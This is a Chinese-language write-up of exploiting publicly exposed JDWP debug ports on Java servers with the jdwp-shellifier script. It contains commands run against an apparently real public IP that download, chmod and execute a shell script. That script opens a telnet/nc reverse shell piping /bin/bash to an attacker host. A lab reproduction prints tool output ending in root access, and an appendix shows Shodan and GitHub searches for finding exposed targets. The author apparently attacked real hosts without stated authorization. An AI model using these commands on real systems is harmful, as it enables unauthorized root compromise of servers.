尝试对jdwp端口开放主机进行代码执行
发现了几个jdwp端口公网开放,先用metasploit:https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger
没有成功,还有nmap脚本:https://nmap.org/nsedoc/scripts/jdwp-exec.html 也没成功。据下文的利用脚本的原理说,nmap脚本之所以不成功的原因是这个nmap脚本使用了硬编码的大小。
然后参考这种方法:
https://www.exploit-db.com/papers/27179/
说是找到一个方法,然后下断点,然后就可以
print new java.lang.Runtime.exec("date");
但是发现一直弄不了,
然后查了一下jdwp的资料,使用
jdb -attach IP:PORT
的方式可以查看到服务器的一些信息。
但是不知道怎么进一步利用。
jdwp协议
jdwp(Java Debug Wire Protocol)协议通信之前需要先握手,即客户端( Debugger)先发送一个14个字符的ASCII字符串:“JDWP-Handshake”
,然后服务端(Debuggee )返回同样的字符串,即可完成握手。
利用jdwp-shellifier实现代码执行
利用脚本(这个脚本旨在将暴露的jdwp端口转化成稳定的代码执行漏洞):
https://github.com/IOActive/jdwp-shellifier
脚本原理参考:https://ioactive.com/hacking-java-debug-wire-protocol-or-how/
成功执行ping
另外还可以用这个dnslog:http://dnsbin.zhack.ca
用wireshark抓包发现
反弹shell
下面这个方法当时没仔细看,后来看到了,端口已经关了。[捂脸]
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd 'chmod a+x /tmp/shell.sh'
./jdwp-exp.py -t 221.123.167.230 -p 8000 --cmd '/tmp/shell.sh'
shell.txt内容:(需要开2个端口,一个用于发送命令一个用于接受命令返回)
telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333
参考:polycom(宝利通)RSS4000默认开启jdwp端口导致系统命令执行
自己搭环境测试
在ubuntu以debug模式启动tomcat
只需要
sudo ./bin/catalina.sh jpda start
查看tomcat在调试模式运行的完整命令:
ps aux|grep java
root 73856 0.2 4.6 2520612 94212 pts/4 Sl 20:43 0:09 /usr/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -agentlib:jdwp=transport=dt_socket,address=8000,server=y,suspend=n -Djava.endorsed.dirs=/opt/tomcat/endorsed -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
在windows上通过jdb连接debug模式的tomcat
先通过之前默认的jdb -attach IP:PORT模式,发现启动不成功。
通过搜索错误信息:shmemBase_attach failed
找到一个答案:
https://community.oracle.com/thread/1177940
是因为windows默认使用shared memory transport
, 连接器是com.sun.jdi.SharedMemoryAttach
,如果想通过socket连接,即通过网络连接来调试,需要告诉jdb,使用socket attaching connector
。
可以通过命令查看可用的连接器:
jdb -listconnectors|findstr 连接器
完整命令参考:http://www.herongyang.com/Java-Tools/jdb-Debug-Java-Application-Remotely.html
最后通过
jdb -connect com.sun.jdi.SocketAttach:hostname=192.168.96.129,port=8000
连接成功了。
比较搞不懂的是,jdb都可以conncet,为什么我用tcp连接测试,就是积极拒绝
呢?
这个结果跟之前测试的存在漏洞的主机一致,netcat只是偶尔能连接上,而jdb -connect是一直可以的。
然后测试一下可不可以用那个脚本进行利用。
过程如下:
先在windows上开两个netcat分别对1111和3333端口进行监听
ncat -l 1111
ncat -l 3333
用于后续的反弹shell之用。
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd 'wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=882
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0x968
[+] Selected payload 'wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh'
[+] Command string object created id:969
[+] Runtime.getRuntime() returned context id:0x96a
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=96b
[!] Command successfully executed
? jdwp-shellifier git:(master) cat /tmp/shell.sh
nc 192.168.96.1 1111 | /bin/bash | nc 192.168.96.1 3333%
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd 'chmod a+x /tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=947
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0xa32
[+] Selected payload 'chmod a+x /tmp/shell.sh'
[+] Command string object created id:a33
[+] Runtime.getRuntime() returned context id:0xa34
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=a35
[!] Command successfully executed
? jdwp-shellifier git:(master) ll /tmp/shell.sh
-rwxr-xr-x 1 root root 55 Oct 18 20:03 /tmp/shell.sh*
? jdwp-shellifier git:(master) python2 jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on "java.lang.String.indexOf" --cmd '/tmp/shell.sh'
[+] Targeting '127.0.0.1:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.8.0_181'
[+] Found Runtime class: id=947
[+] Found Runtime.getRuntime(): id=7f4c40004710
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0xa32
[+] Selected payload '/tmp/shell.sh'
[+] Command string object created id:a33
[+] Runtime.getRuntime() returned context id:0xa34
[+] found Runtime.exec(): id=7f4c40004770
[+] Runtime.exec() successful, retId=a35
[!] Command successfully executed
连接成功之后的反弹shell,由于tomcat是以sudo启动,所以这里拿到的是root权限。
全程如下:
Ubuntu(开启jdwp)
sudo netstat -plnt|grep 8000
sudo ./bin/catalina.sh jpda start
sudo netstat -plnt|grep 8000
Windows(攻击者)
利用脚本:https://github.com/IOActive/jdwp-shellifier
开启netcat监听
ncat -vl 1111(cmd1)
ncat -vl 3333(cmd2)
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "wget http://192.168.96.1:80/shell.txt -O /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "chmod a+x /tmp/shell.sh"
python2 jdwp-shellifier.py -t 192.168.96.129 -p 8000 --break-on "java.lang.String.indexOf" --cmd "/tmp/shell.sh"
附录
- 在github上搜索近期更新的带有
-Xdebug -Xrunjdwp
的代码:
https://github.com/search?o=desc&q=-Xdebug+-Xrunjdwp&s=indexed&type=Code - Shodan上搜索JDWP服务:https://www.shodan.io/search?query=JDWP-HANDSHAKE
- Internet快速端口扫描工具:https://github.com/robertdavidgraham/masscan